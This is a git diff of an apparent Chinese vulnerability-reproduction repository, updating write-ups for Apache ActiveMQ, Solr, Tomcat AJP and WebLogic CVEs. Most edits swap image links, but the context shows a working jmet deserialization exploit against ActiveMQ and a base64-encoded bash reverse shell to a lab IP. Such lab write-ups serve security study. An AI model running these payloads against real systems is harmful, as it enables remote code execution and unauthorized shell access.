更新漏洞库：Web服务器漏洞/

Web服务器漏洞/Apache ActiveMQ 反序列化漏洞 CVE-2015-5254.md

@@ -51,11 +51,11 @@ sudo update-alternatives --install /usr/bin/java java /usr/lib/jvm/java-8-openjd
 sudo update-alternatives --config java
 ```
 
-![image-20220221132209838](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211350253.png)
+![image-20220221132209838](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211347913.png)
 
 再次查看java版本，切换成功
 
-![image-20220221132246597](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211350254.png)
+![image-20220221132246597](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211347914.png)
 
 ### 漏洞复现
 
@@ -72,17 +72,17 @@ mkdir external
 java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/awesome_poc" -Yp ROME 192.168.174.128 61616
 ```
 
-![image-20220221133654012](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211350255.png)
+![image-20220221133654012](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211347915.png)
 
 访问 http://192.168.174.128:8161/admin/browse.jsp?JMSDestination=event 可以看到多了一条消息队列，ID为kali-38087-1645421794512-1:1:1:1:1
 
-![image-20220221133733242](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211350256.png)
+![image-20220221133733242](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211347916.png)
 
 点击这个信息触发文件创建，成功执行命令 touch /tmp/awesome_poc
 
-![image-20220221133952983](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211350257.png)
+![image-20220221133952983](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211347917.png)
 
-![2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211350258.png)也可以创建一个反弹shell的payload
+![2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211347918.png)也可以创建一个反弹shell的payload
 
 ```shell
 bash -i >& /dev/tcp/192.168.174.128/9999 0>&1  (base64编码)
@@ -94,13 +94,13 @@ bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3NC4xMjgvOTk5OSAwPiYx}|{bas
 java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3NC4xMjgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.174.128 61616
 ```
 
-![image-20220221134243490](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211350259.png)
+![image-20220221134243490](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211347919.png)
 
 查看消息队列，ID为kali-38435-1645422155171-1:1:1:1:1
 
-![image-20220221134313545](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211350260.png)
+![image-20220221134313545](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211347920.png)
 
 监听9999端口，点击消息队列会触发命令执行，反弹Shell
 
-![image-20220221134508900](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211350261.png)
+![image-20220221134508900](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211347921.png)
 

Web服务器漏洞/Apache Solr Velocity模板远程执行 CVE-2019-17558.md

@@ -38,7 +38,7 @@ docker-compose exec solr bash bin/solr create_core -c test -d example/example-DI
 
 
 
-访问Core的config配置信息时，通过POST请求把`{% em type="red" %}params.resource.loader.enabled{% end em %}`设置为 True，再通过精心构造的get请求即可RCE，此时用户就可以加载指定资源，构造一个能执行命令的恶意请求
+访问Core的config配置信息时，通过POST请求把{% em type="red" %}params.resource.loader.enabled{% endem %}设置为 True，再通过精心构造的get请求即可RCE，此时用户就可以加载指定资源，构造一个能执行命令的恶意请求
 
 **设置params.resource.loader.enabled为True**
 

Web服务器漏洞/Apache Tomcat AJP 文件包含漏洞 CVE-2020-1938.md

@@ -364,3 +364,4 @@ print("".join([d.data for d in data]))
 [Github地址](https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi/blob/master/CNVD-2020-10487-Tomcat-Ajp-lfi.py)
 
 [威胁通告 APACHE TOMCAT 文件包含漏洞（CVE-2020-1938）](http://blog.nsfocus.net/cve-2020-1938/)
+

Web服务器漏洞/Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271.md

@@ -176,3 +176,4 @@ if __name__ == '__main__':
 ```
 
 ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091225540.png)
+